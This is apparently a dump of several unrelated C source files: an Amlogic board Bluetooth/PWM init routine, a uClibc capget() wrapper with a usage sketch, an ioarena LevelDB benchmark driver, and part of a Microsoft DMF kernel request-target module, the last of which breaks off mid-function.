status = mmio_buffer_init_physical(&buffer, S905D2_PWM_BASE, 0x1a000, get_root_resource(), ZX_CACHE_POLICY_UNCACHED_DEVICE); if (status != ZX_OK) { zxlogf(ERROR, "aml_enable_wifi_32K: mmio_buffer_init_physical failed: %d\n", status); zx_handle_close(bti); return status; } uint32_t* regs = buffer.vaddr; // these magic numbers were gleaned by instrumenting drivers/amlogic/pwm/pwm_meson.c // TODO(voydanoff) write a proper PWM driver writel(0x016d016e, regs + S905D2_PWM_PWM_E); writel(0x016d016d, regs + S905D2_PWM_E2); writel(0x0a0a0609, regs + S905D2_PWM_TIME_EF); writel(0x02808003, regs + S905D2_PWM_MISC_REG_EF); mmio_buffer_release(&buffer); zx_handle_close(bti); return ZX_OK; } zx_status_t aml_bluetooth_init(aml_bus_t* bus) { zx_status_t status; // set alternate functions to enable Bluetooth UART status = gpio_impl_set_alt_function(&bus->gpio, S905D2_UART_TX_A, S905D2_UART_TX_A_FN); if (status != ZX_OK) return status; status = gpio_impl_set_alt_function(&bus->gpio, S905D2_UART_RX_A, S905D2_UART_RX_A_FN); if (status != ZX_OK) return status; status = gpio_impl_set_alt_function(&bus->gpio, S905D2_UART_CTS_A, S905D2_UART_CTS_A_FN); if (status != ZX_OK) return status; status = gpio_impl_set_alt_function(&bus->gpio, S905D2_UART_RTS_A, S905D2_UART_RTS_A_FN); if (status != ZX_OK) return status; // Configure the SOC_WIFI_LPO_32k768 PWM, which is needed for the Bluetooth module to work properly status = aml_enable_wifi_32K(bus); if (status != ZX_OK) { return status; } // set GPIO to reset Bluetooth module gpio_impl_config_out(&bus->gpio, SOC_BT_REG_ON, 0); usleep(10 * 1000); gpio_impl_write(&bus->gpio, SOC_BT_REG_ON, 1); usleep(100 * 1000); // Bind UART for Bluetooth HCI status = pbus_device_add(&bus->pbus, &bt_uart_dev); if (status != ZX_OK) { zxlogf(ERROR, "aml_uart_init: pbus_device_add failed: %d\n", status); return status; } return ZX_OK; }
152632.c
/* vi: set sw=4 ts=4: */ /* * capget() for uClibc * * Copyright (C) 2000-2006 Erik Andersen <andersen@uclibc.org> * * Licensed under the LGPL v2.1, see the file COPYING.LIB in this tarball. */ #include <sys/syscall.h> int capget(void *header, void *data); #ifdef __NR_capget _syscall2(int, capget, void *, header, void *, data); #else int capget(void *header, void *data) { __set_errno(ENOSYS); return -1; } #endif
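A usage sketch for the wrapper above, using the kernel capability structures from <linux/capability.h>. With _LINUX_CAPABILITY_VERSION_3 the data argument is an array of two elements, and pid 0 queries the calling process; this program is illustrative and not part of uClibc.

#include <linux/capability.h>
#include <stdio.h>

extern int capget(void *header, void *data);

int main(void)
{
    struct __user_cap_header_struct hdr;
    struct __user_cap_data_struct data[2];

    hdr.version = _LINUX_CAPABILITY_VERSION_3;
    hdr.pid = 0; /* 0 means the calling process */

    if (capget(&hdr, data) != 0) {
        perror("capget");
        return 1;
    }
    printf("effective=0x%x permitted=0x%x inheritable=0x%x\n",
           data[0].effective, data[0].permitted, data[0].inheritable);
    return 0;
}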
175174.c
 /* * ioarena: embedded storage benchmarking * * Copyright (c) ioarena authors * BSD License */ #include "ioarena.h" #include "leveldb/c.h" struct iaprivate { leveldb_options_t *opts; leveldb_readoptions_t *ropts; leveldb_writeoptions_t *wopts; leveldb_t *db; }; struct iacontext { leveldb_iterator_t *it; leveldb_writebatch_t *batch; char *result; }; static int ia_leveldb_open(const char *datadir) { iadriver *drv = ioarena.driver; drv->priv = calloc(1, sizeof(iaprivate)); if (drv->priv == NULL) return -1; iaprivate *self = drv->priv; self->opts = leveldb_options_create(); leveldb_options_set_compression(self->opts, leveldb_no_compression); leveldb_options_set_info_log(self->opts, NULL); leveldb_options_set_create_if_missing(self->opts, 1); self->wopts = leveldb_writeoptions_create(); self->ropts = leveldb_readoptions_create(); leveldb_readoptions_set_fill_cache(self->ropts, 1); /* LY: suggestions are welcome */ switch (ioarena.conf.syncmode) { case IA_SYNC: leveldb_writeoptions_set_sync(self->wopts, 1); break; case IA_LAZY: case IA_NOSYNC: leveldb_writeoptions_set_sync(self->wopts, 0); break; default: ia_log("error: %s(): unsupported syncmode %s", __func__, ia_syncmode2str(ioarena.conf.syncmode)); return -1; } switch (ioarena.conf.walmode) { case IA_WAL_INDEF: case IA_WAL_ON: break; case IA_WAL_OFF: default: ia_log("error: %s(): unsupported walmode %s", __func__, ia_walmode2str(ioarena.conf.walmode)); return -1; } char *error = NULL; self->db = leveldb_open(self->opts, datadir, &error); if (error != NULL) goto bailout; return 0; bailout: ia_log("error: %s, %s", __func__, error); free(error); return -1; } static int ia_leveldb_close(void) { iaprivate *self = ioarena.driver->priv; if (self) { ioarena.driver->priv = NULL; if (self->db) leveldb_close(self->db); if (self->ropts) leveldb_readoptions_destroy(self->ropts); if (self->wopts) leveldb_writeoptions_destroy(self->wopts); if (self->opts) leveldb_options_destroy(self->opts); free(self); } return 0; } static iacontext *ia_leveldb_thread_new(void) { iacontext *ctx = calloc(1, sizeof(iacontext)); return ctx; } void ia_leveldb_thread_dispose(iacontext *ctx) { if (ctx->result) free(ctx->result); if (ctx->it) leveldb_iter_destroy(ctx->it); if (ctx->batch) leveldb_writebatch_destroy(ctx->batch); free(ctx); } static int ia_leveldb_begin(iacontext *ctx, iabenchmark step) { iaprivate *self = ioarena.driver->priv; int rc = 0; const char *error = NULL; switch (step) { case IA_GET: case IA_SET: case IA_DELETE: break; case IA_ITERATE: ctx->it = leveldb_create_iterator(self->db, self->ropts); if (!ctx->it) { error = "leveldb_create_iterator() failed"; goto bailout; } leveldb_iter_seek_to_first(ctx->it); break; case IA_CRUD: case IA_BATCH: ctx->batch = leveldb_writebatch_create(); if (!ctx->batch) { error = "leveldb_writebatch_create() failed"; goto bailout; } break; default: assert(0); rc = -1; } return rc; bailout: ia_log("error: %s, %s, %s", __func__, ia_benchmarkof(step), error); return -1; } static int ia_leveldb_done(iacontext *ctx, iabenchmark step) { iaprivate *self = ioarena.driver->priv; int rc = 0; char *error = NULL; switch (step) { case IA_GET: if (ctx->result) { free(ctx->result); ctx->result = NULL; } case IA_SET: case IA_DELETE: break; case IA_ITERATE: if (ctx->it) { leveldb_iter_destroy(ctx->it); ctx->it = NULL; } break; case IA_CRUD: case IA_BATCH: if (ctx->batch) { leveldb_write(self->db, self->wopts, ctx->batch, &error); if (error != NULL) goto bailout; leveldb_writebatch_destroy(ctx->batch); ctx->batch = NULL; } break; default: 
assert(0); rc = -1; } return rc; bailout: ia_log("error: %s, %s, %s", __func__, ia_benchmarkof(step), error); free(error); return -1; } static int ia_leveldb_next(iacontext *ctx, iabenchmark step, iakv *kv) { iaprivate *self = ioarena.driver->priv; int rc = 0; char *error = NULL; switch (step) { case IA_SET: if (ctx->batch) leveldb_writebatch_put(ctx->batch, kv->k, kv->ksize, kv->v, kv->vsize); else leveldb_put(self->db, self->wopts, kv->k, kv->ksize, kv->v, kv->vsize, &error); if (error) goto bailout; break; case IA_DELETE: if (ctx->batch) leveldb_writebatch_delete(ctx->batch, kv->k, kv->ksize); else leveldb_delete(self->db, self->wopts, kv->k, kv->ksize, &error); if (error) goto bailout; break; case IA_GET: if (ctx->result) free(ctx->result); ctx->result = leveldb_get(self->db, self->ropts, kv->k, kv->ksize, &kv->vsize, &error); if (error) goto bailout; if (!ctx->result) { if (!ctx->batch) /* TODO: rework to avoid */ { rc = ENOENT; break; } } kv->v = ctx->result; break; case IA_ITERATE: if (!leveldb_iter_valid(ctx->it)) return ENOENT; kv->k = (char *)leveldb_iter_key(ctx->it, &kv->ksize); leveldb_iter_next(ctx->it); break; default: assert(0); rc = -1; } return rc; bailout: ia_log("error: %s, %s, %s", __func__, ia_benchmarkof(step), error); free(error); return -1; } iadriver ia_leveldb = {.name = "leveldb", .priv = NULL, .open = ia_leveldb_open, .close = ia_leveldb_close, .thread_new = ia_leveldb_thread_new, .thread_dispose = ia_leveldb_thread_dispose, .begin = ia_leveldb_begin, .next = ia_leveldb_next, .done = ia_leveldb_done};
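For reference, a minimal standalone sketch of the leveldb C API calls that the driver above wraps: create options, open with create_if_missing, one put, one get, then teardown in reverse order. The database path and key are placeholders, and error handling is reduced to a single pattern.

#include <stdio.h>
#include <stdlib.h>
#include "leveldb/c.h"

int main(void)
{
    char *err = NULL;
    size_t vlen = 0;

    leveldb_options_t *opts = leveldb_options_create();
    leveldb_options_set_create_if_missing(opts, 1);

    leveldb_t *db = leveldb_open(opts, "/tmp/ldb-example", &err);
    if (err != NULL) { fprintf(stderr, "open: %s\n", err); free(err); return 1; }

    leveldb_writeoptions_t *wopts = leveldb_writeoptions_create();
    leveldb_put(db, wopts, "key", 3, "value", 5, &err);
    if (err != NULL) { fprintf(stderr, "put: %s\n", err); free(err); }

    leveldb_readoptions_t *ropts = leveldb_readoptions_create();
    char *val = leveldb_get(db, ropts, "key", 3, &vlen, &err);
    if (val != NULL) { printf("%.*s\n", (int)vlen, val); leveldb_free(val); }

    leveldb_readoptions_destroy(ropts);
    leveldb_writeoptions_destroy(wopts);
    leveldb_close(db);
    leveldb_options_destroy(opts);
    return 0;
}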
335326.c
/*++ Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT license. Module Name: Dmf_ContinuousRequestTarget.c Abstract: Creates a stream of asynchronous requests to a specific IO Target. Also, there is support for sending synchronous requests to the same IO Target. Environment: Kernel-mode Driver Framework User-mode Driver Framework --*/ // DMF and this Module's Library specific definitions. // #include "DmfModule.h" #include "DmfModules.Library.h" #include "DmfModules.Library.Trace.h" #include "Dmf_ContinuousRequestTarget.tmh" /////////////////////////////////////////////////////////////////////////////////////////////////////// // Module Private Enumerations and Structures /////////////////////////////////////////////////////////////////////////////////////////////////////// // /////////////////////////////////////////////////////////////////////////////////////////////////////// // Module Private Context /////////////////////////////////////////////////////////////////////////////////////////////////////// // typedef struct { // Input Buffer List. // DMFMODULE DmfModuleBufferPoolInput; // Output Buffer List. // DMFMODULE DmfModuleBufferPoolOutput; // Context Buffer List. // DMFMODULE DmfModuleBufferPoolContext; // Queued workitem for passive level completion routine. // Stream Asynchronous Request. // DMFMODULE DmfModuleQueuedWorkitemStream; // Queued workitem for passive level completion routine. // Single Asynchronous Request. // DMFMODULE DmfModuleQueuedWorkitemSingle; // Completion routine for stream asynchronous requests. // EVT_WDF_REQUEST_COMPLETION_ROUTINE* CompletionRoutineStream; // IO Target to Send Requests to. // WDFIOTARGET IoTarget; // Indicates that the Client has stopped streaming. This flag prevents new requests from // being sent to the underlying target. // BOOLEAN Stopping; // Count of requests in lower driver so that Module can shutdown gracefully. // NOTE: This is for User-mode rundown support. Once Rundown support is unified for // Kernel and user-modes, this can be removed. // LONG PendingStreamingRequests; // Count of streaming requests so that Module can shutdown gracefully. // LONG StreamingRequestCount; // Collection of asynchronous stream requests. This is the Collection of requests that is created // when the Module is instantiated. // WDFCOLLECTION CreatedStreamRequestsCollection; // Collection of asynchronous transient stream requests. Requests are added to this collection when // streaming starts and are removed when streaming stops. // WDFCOLLECTION TransientStreamRequestsCollection; // Rundown for sending stream requests. // DMF_PORTABLE_RUNDOWN_REF StreamRequestsRundown; // Rundown for in-flight stream requests. // DMF_PORTABLE_EVENT StreamRequestsRundownCompletionEvent; } DMF_CONTEXT_ContinuousRequestTarget; // This macro declares the following function: // DMF_CONTEXT_GET() // DMF_MODULE_DECLARE_CONTEXT(ContinuousRequestTarget) // This macro declares the following function: // DMF_CONFIG_GET() // DMF_MODULE_DECLARE_CONFIG(ContinuousRequestTarget) // Memory Pool Tag. 
// #define MemoryTag 'mTRC' /////////////////////////////////////////////////////////////////////////////////////////////////////// // DMF Module Support Code /////////////////////////////////////////////////////////////////////////////////////////////////////// // #define DEFAULT_NUMBER_OF_PENDING_PASSIVE_LEVEL_COMPLETION_ROUTINES 4 typedef struct { DMFMODULE DmfModule; ContinuousRequestTarget_RequestType SingleAsynchronousRequestType; EVT_DMF_ContinuousRequestTarget_SendCompletion* EvtContinuousRequestTargetSingleAsynchronousRequest; VOID* SingleAsynchronousCallbackClientContext; } ContinuousRequestTarget_SingleAsynchronousRequestContext; typedef struct { WDFREQUEST Request; WDF_REQUEST_COMPLETION_PARAMS RequestCompletionParams; ContinuousRequestTarget_SingleAsynchronousRequestContext* SingleAsynchronousRequestContext; } ContinuousRequestTarget_QueuedWorkitemContext; static VOID ContinuousRequestTarget_PrintDataReceived( _In_reads_bytes_(Length) BYTE* Buffer, _In_ ULONG Length ) /*++ Routine Description: Prints every byte stored in buffer of a given length. Arguments: Buffer: Pointer to a buffer Length: Length of the buffer Return Value: None --*/ { UNREFERENCED_PARAMETER(Buffer); UNREFERENCED_PARAMETER(Length); #if defined(DEBUG) ULONG bufferIndex; TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "BufferStart"); for (bufferIndex = 0; bufferIndex < Length; bufferIndex++) { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "%02X", *(Buffer + bufferIndex)); } TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "BufferEnd"); #endif // defined(DEBUG) } static VOID ContinuousRequestTarget_DeleteStreamRequestsFromCollection( _In_ DMF_CONTEXT_ContinuousRequestTarget* ModuleContext ) /*++ Routine Description: Remove and delete requests collected in CreatedStreamRequestsCollection. Arguments: ModuleContext - This Module's context. Return Value: None --*/ { WDFREQUEST request; while ((request = (WDFREQUEST)WdfCollectionGetFirstItem(ModuleContext->CreatedStreamRequestsCollection)) != NULL) { WdfCollectionRemoveItem(ModuleContext->CreatedStreamRequestsCollection, 0); WdfObjectDelete(request); } } #if !defined(DMF_USER_MODE) static VOID ContinuousRequestTarget_DecreaseStreamRequestCount( _In_ DMF_CONTEXT_ContinuousRequestTarget* ModuleContext ) /*++ Routine Description: Decrease the total number of active streaming requests by 1. If the count reaches 0, signal the rundown completion event. Arguments: ModuleContext - This Module's context. Return Value: None --*/ { LONG result; result = InterlockedDecrement(&ModuleContext->StreamingRequestCount); DmfAssert(result >= 0); TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "[%d -> %d]", result + 1, result); if (0 == result) { DMF_Portable_EventSet(&ModuleContext->StreamRequestsRundownCompletionEvent); TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "StreamRequestsRundownCompletionEvent SET"); } } #endif static VOID ContinuousRequestTarget_CompletionParamsInputBufferAndOutputBufferGet( _In_ DMFMODULE DmfModule, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ ContinuousRequestTarget_RequestType RequestType, _Out_ VOID** InputBuffer, _Out_ size_t* InputBufferSize, _Out_ VOID** OutputBuffer, _Out_ size_t* OutputBufferSize ) /*++ Routine Description: This routine is called in Completion routine of Asynchronous requests. It returns the right input buffer and output buffer pointers based on the Request type (Read/Write/Ioctl) specified in Module Config. It also returns the input and output buffer sizes Arguments: DmfModule - This Module's handle. 
CompletionParams - Information about the completion. RequestType - Type of request. InputBuffer - Pointer to Input buffer. InputBufferSize - Size of Input buffer. OutputBuffer - Pointer to Output buffer. OutputBufferSize - Size of Output buffer. Return Value: None --*/ { DMF_CONFIG_ContinuousRequestTarget* moduleConfig; WDFMEMORY inputMemory; WDFMEMORY outputMemory; FuncEntry(DMF_TRACE); moduleConfig = DMF_CONFIG_GET(DmfModule); *InputBufferSize = 0; *InputBuffer = NULL; *OutputBufferSize = 0; *OutputBuffer = NULL; switch (RequestType) { case ContinuousRequestTarget_RequestType_Read: { // Get the read buffer memory handle. // *OutputBufferSize = CompletionParams->Parameters.Read.Length; outputMemory = CompletionParams->Parameters.Read.Buffer; // Get the read buffer. // if (outputMemory != NULL) { *OutputBuffer = WdfMemoryGetBuffer(outputMemory, NULL); DmfAssert(*OutputBuffer != NULL); } break; } case ContinuousRequestTarget_RequestType_Write: { // Get the write buffer memory handle. // *InputBufferSize = CompletionParams->Parameters.Write.Length; inputMemory = CompletionParams->Parameters.Write.Buffer; // Get the write buffer. // if (inputMemory != NULL) { *InputBuffer = WdfMemoryGetBuffer(inputMemory, NULL); DmfAssert(*InputBuffer != NULL); } break; } case ContinuousRequestTarget_RequestType_Ioctl: case ContinuousRequestTarget_RequestType_InternalIoctl: { // Get the input and output buffers' memory handles. // inputMemory = CompletionParams->Parameters.Ioctl.Input.Buffer; outputMemory = CompletionParams->Parameters.Ioctl.Output.Buffer; // Get the input and output buffers. // if (inputMemory != NULL) { *InputBuffer = WdfMemoryGetBuffer(inputMemory, InputBufferSize); DmfAssert(*InputBuffer != NULL); } if (outputMemory != NULL) { *OutputBuffer = WdfMemoryGetBuffer(outputMemory, OutputBufferSize); DmfAssert(*OutputBufferSize >= CompletionParams->Parameters.Ioctl.Output.Length); *OutputBufferSize = CompletionParams->Parameters.Ioctl.Output.Length; DmfAssert(*OutputBuffer != NULL); } break; } default: { DmfAssert(FALSE); } } } VOID ContinuousRequestTarget_ProcessAsynchronousRequestSingle( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ ContinuousRequestTarget_SingleAsynchronousRequestContext* SingleAsynchronousRequestContext ) /*++ Routine Description: This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers. Arguments: DmfModule - The given Dmf Module. Request - The completed request. CompletionParams - Information about the completion. SingleAsynchronousRequestContext - Single asynchronous request context. Return Value: None --*/ { NTSTATUS ntStatus; VOID* inputBuffer; size_t inputBufferSize; VOID* outputBuffer; size_t outputBufferSize; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; FuncEntry(DMF_TRACE); inputBuffer = NULL; outputBuffer = NULL; moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); ntStatus = WdfRequestGetStatus(Request); if (!NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestGetStatus Request=0x%p fails: ntStatus=%!STATUS!", Request, ntStatus); } // Get information about the request completion. // WdfRequestGetCompletionParams(Request, CompletionParams); // Get the input and output buffers. // Input buffer will be NULL for request type read and write. 
// ContinuousRequestTarget_CompletionParamsInputBufferAndOutputBufferGet(DmfModule, CompletionParams, SingleAsynchronousRequestContext->SingleAsynchronousRequestType, &inputBuffer, &inputBufferSize, &outputBuffer, &outputBufferSize); // Call the Client's callback function // if (SingleAsynchronousRequestContext->EvtContinuousRequestTargetSingleAsynchronousRequest != NULL) { (SingleAsynchronousRequestContext->EvtContinuousRequestTargetSingleAsynchronousRequest)(DmfModule, SingleAsynchronousRequestContext->SingleAsynchronousCallbackClientContext, inputBuffer, inputBufferSize, outputBuffer, outputBufferSize, ntStatus); } // The Request is complete. // Put the buffer associated with single asynchronous request back into BufferPool. // DMF_BufferPool_Put(moduleContext->DmfModuleBufferPoolContext, SingleAsynchronousRequestContext); WdfObjectDelete(Request); DMF_ModuleDereference(DmfModule); FuncExitVoid(DMF_TRACE); } EVT_WDF_REQUEST_COMPLETION_ROUTINE ContinuousRequestTarget_CompletionRoutine; _Function_class_(EVT_WDF_REQUEST_COMPLETION_ROUTINE) _IRQL_requires_same_ VOID ContinuousRequestTarget_CompletionRoutine( _In_ WDFREQUEST Request, _In_ WDFIOTARGET Target, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ WDFCONTEXT Context ) /*++ Routine Description: It is the completion routine for the Single Asynchronous requests. This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers. Arguments: Request - The completed request. Target - The Io Target that completed the request. CompletionParams - Information about the completion. Context - This Module's handle. Return Value: None --*/ { ContinuousRequestTarget_SingleAsynchronousRequestContext* singleAsynchronousRequestContext; DMFMODULE dmfModule; UNREFERENCED_PARAMETER(Target); FuncEntry(DMF_TRACE); singleAsynchronousRequestContext = (ContinuousRequestTarget_SingleAsynchronousRequestContext*)Context; DmfAssert(singleAsynchronousRequestContext != NULL); dmfModule = singleAsynchronousRequestContext->DmfModule; DmfAssert(dmfModule != NULL); TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [Completion Request]", Request); ContinuousRequestTarget_ProcessAsynchronousRequestSingle(dmfModule, Request, CompletionParams, singleAsynchronousRequestContext); FuncExitVoid(DMF_TRACE); } EVT_WDF_REQUEST_COMPLETION_ROUTINE ContinuousRequestTarget_CompletionRoutinePassive; _Function_class_(EVT_WDF_REQUEST_COMPLETION_ROUTINE) _IRQL_requires_same_ VOID ContinuousRequestTarget_CompletionRoutinePassive( _In_ WDFREQUEST Request, _In_ WDFIOTARGET Target, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ WDFCONTEXT Context ) /*++ Routine Description: It is the completion routine for the Single Asynchronous requests. This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers. Arguments: Request - The completed request. Target - The Io Target that completed the request. CompletionParams - Information about the completion. Context - This Module's handle. 
Return Value: None --*/ { ContinuousRequestTarget_SingleAsynchronousRequestContext* singleAsynchronousRequestContext; DMFMODULE dmfModule; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; ContinuousRequestTarget_QueuedWorkitemContext workitemContext; UNREFERENCED_PARAMETER(Target); FuncEntry(DMF_TRACE); singleAsynchronousRequestContext = (ContinuousRequestTarget_SingleAsynchronousRequestContext*)Context; DmfAssert(singleAsynchronousRequestContext != NULL); dmfModule = singleAsynchronousRequestContext->DmfModule; DmfAssert(dmfModule != NULL); moduleContext = DMF_CONTEXT_GET(dmfModule); workitemContext.Request = Request; workitemContext.RequestCompletionParams = *CompletionParams; workitemContext.SingleAsynchronousRequestContext = singleAsynchronousRequestContext; TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [Enqueue Completion]", Request); DMF_QueuedWorkItem_Enqueue(moduleContext->DmfModuleQueuedWorkitemSingle, (VOID*)&workitemContext, sizeof(ContinuousRequestTarget_QueuedWorkitemContext)); FuncExitVoid(DMF_TRACE); } // The completion routine calls this function so it needs to be declared here. // static NTSTATUS ContinuousRequestTarget_StreamRequestSend( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request ); VOID ContinuousRequestTarget_ProcessAsynchronousRequestStream( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams ) /*++ Routine Description: This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers. Arguments: DmfModule - The given Dmf Module. Request - The completed request. CompletionParams - Information about the completion. Return Value: None --*/ { NTSTATUS ntStatus; VOID* inputBuffer; size_t inputBufferSize; VOID* outputBuffer; size_t outputBufferSize; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; ContinuousRequestTarget_BufferDisposition bufferDisposition; VOID* clientBufferContextOutput; FuncEntry(DMF_TRACE); inputBuffer = NULL; outputBuffer = NULL; moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); ntStatus = WdfRequestGetStatus(Request); TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "WdfRequestGetStatus Request=0x%p completes: ntStatus=%!STATUS!", Request, ntStatus); // Get information about the request completion. // WdfRequestGetCompletionParams(Request, CompletionParams); // Get the input and output buffers. // Input buffer will be NULL for request type read and write. // ContinuousRequestTarget_CompletionParamsInputBufferAndOutputBufferGet(DmfModule, CompletionParams, moduleConfig->RequestType, &inputBuffer, &inputBufferSize, &outputBuffer, &outputBufferSize); if (outputBuffer != NULL) { DMF_BufferPool_ContextGet(moduleContext->DmfModuleBufferPoolOutput, outputBuffer, &clientBufferContextOutput); // If Client has stopped streaming, then regardless of what the Client returns from the callback, return buffers // back to the original state and delete corresponding requests. 
// if (moduleContext->Stopping) { TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "Request=0x%p [STOPPED]", Request); bufferDisposition = ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndStopStreaming; } else { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [Not Stopped]", Request); if (NT_SUCCESS(ntStatus)) { ContinuousRequestTarget_PrintDataReceived((BYTE*)outputBuffer, (ULONG)outputBufferSize); } // Call the Client's callback function to give the Client Buffer a chance to use the output buffer. // The Client returns TRUE if Client expects this Module to return the buffer to its own list. // Otherwise, the Client will take ownership of the buffer and return it later using a Module Method. // bufferDisposition = moduleConfig->EvtContinuousRequestTargetBufferOutput(DmfModule, outputBuffer, outputBufferSize, clientBufferContextOutput, ntStatus); DmfAssert(bufferDisposition > ContinuousRequestTarget_BufferDisposition_Invalid); DmfAssert(bufferDisposition < ContinuousRequestTarget_BufferDisposition_Maximum); } if (((bufferDisposition == ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndContinueStreaming) || (bufferDisposition == ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndStopStreaming)) && (outputBuffer != NULL)) { // The Client indicates that it is finished with the buffer. So return it back to the // list of output buffers. // DMF_BufferPool_Put(moduleContext->DmfModuleBufferPoolOutput, outputBuffer); } } else { if ((!NT_SUCCESS(ntStatus)) || (moduleContext->Stopping)) { bufferDisposition = ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndStopStreaming; } else { bufferDisposition = ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndContinueStreaming; } } // Input buffer will be NULL for Request types Read and Write. // if (inputBuffer != NULL) { // Always return the Input Buffer back to the Input Buffer List. // DMF_BufferPool_Put(moduleContext->DmfModuleBufferPoolInput, inputBuffer); } if (((bufferDisposition == ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndContinueStreaming) || (bufferDisposition == ContinuousRequestTarget_BufferDisposition_ClientAndContinueStreaming)) ) { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p Send again", Request); ntStatus = ContinuousRequestTarget_StreamRequestSend(DmfModule, Request); if (!NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_StreamRequestSend fails: ntStatus=%!STATUS! Request=0x%p", ntStatus, Request); } else { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "ContinuousRequestTarget_StreamRequestSend success: ntStatus=%!STATUS! Request=0x%p", ntStatus, Request); } } else { ntStatus = STATUS_CANCELLED; TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "Cancel due to callback: ntStatus=%!STATUS! Request=0x%p", ntStatus, Request); } if (!NT_SUCCESS(ntStatus)) { #if ! defined(DMF_USER_MODE) // This request stream has stopped so reduce the total count // ContinuousRequestTarget_DecreaseStreamRequestCount(moduleContext); #endif // Remove on decrement so we know what requests are still outstanding. // WdfCollectionRemove(moduleContext->TransientStreamRequestsCollection, Request); } else { #if ! defined(DMF_USER_MODE) TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [No decrement]", Request); #endif } // Request has returned. Decrement. 
// InterlockedDecrement(&moduleContext->PendingStreamingRequests); DMF_ModuleDereference(DmfModule); FuncExitVoid(DMF_TRACE); } EVT_WDF_REQUEST_COMPLETION_ROUTINE ContinuousRequestTarget_StreamCompletionRoutine; _Function_class_(EVT_WDF_REQUEST_COMPLETION_ROUTINE) _IRQL_requires_same_ VOID ContinuousRequestTarget_StreamCompletionRoutine( _In_ WDFREQUEST Request, _In_ WDFIOTARGET Target, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ WDFCONTEXT Context ) /*++ Routine Description: It is the completion routine for the Asynchronous requests. This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers so that the Client can do Client specific processing. Arguments: Request - The completed request. Target - The Io Target that completed the request. CompletionParams - Information about the completion. Context - This Module's handle. Return Value: None --*/ { DMFMODULE dmfModule; UNREFERENCED_PARAMETER(Target); FuncEntry(DMF_TRACE); dmfModule = DMFMODULEVOID_TO_MODULE(Context); ContinuousRequestTarget_ProcessAsynchronousRequestStream(dmfModule, Request, CompletionParams); FuncExitVoid(DMF_TRACE); } EVT_WDF_REQUEST_COMPLETION_ROUTINE ContinuousRequestTarget_StreamCompletionRoutinePassive; _Function_class_(EVT_WDF_REQUEST_COMPLETION_ROUTINE) _IRQL_requires_same_ VOID ContinuousRequestTarget_StreamCompletionRoutinePassive( _In_ WDFREQUEST Request, _In_ WDFIOTARGET Target, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ WDFCONTEXT Context ) /*++ Routine Description: It is the completion routine for the Asynchronous requests. This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers so that the Client can do Client specific processing. Arguments: Request - The completed request. Target - The Io Target that completed the request. CompletionParams - Information about the completion. Context - This Module's handle. Return Value: None --*/ { DMFMODULE dmfModule; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; ContinuousRequestTarget_QueuedWorkitemContext workitemContext; UNREFERENCED_PARAMETER(Target); FuncEntry(DMF_TRACE); dmfModule = DMFMODULEVOID_TO_MODULE(Context); moduleContext = DMF_CONTEXT_GET(dmfModule); workitemContext.Request = Request; workitemContext.RequestCompletionParams = *CompletionParams; DMF_QueuedWorkItem_Enqueue(moduleContext->DmfModuleQueuedWorkitemStream, (VOID*)&workitemContext, sizeof(ContinuousRequestTarget_QueuedWorkitemContext)); } static NTSTATUS ContinuousRequestTarget_FormatRequestForRequestType( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request, _In_ ContinuousRequestTarget_RequestType RequestType, _In_ ULONG RequestIoctlCode, _In_opt_ WDFMEMORY 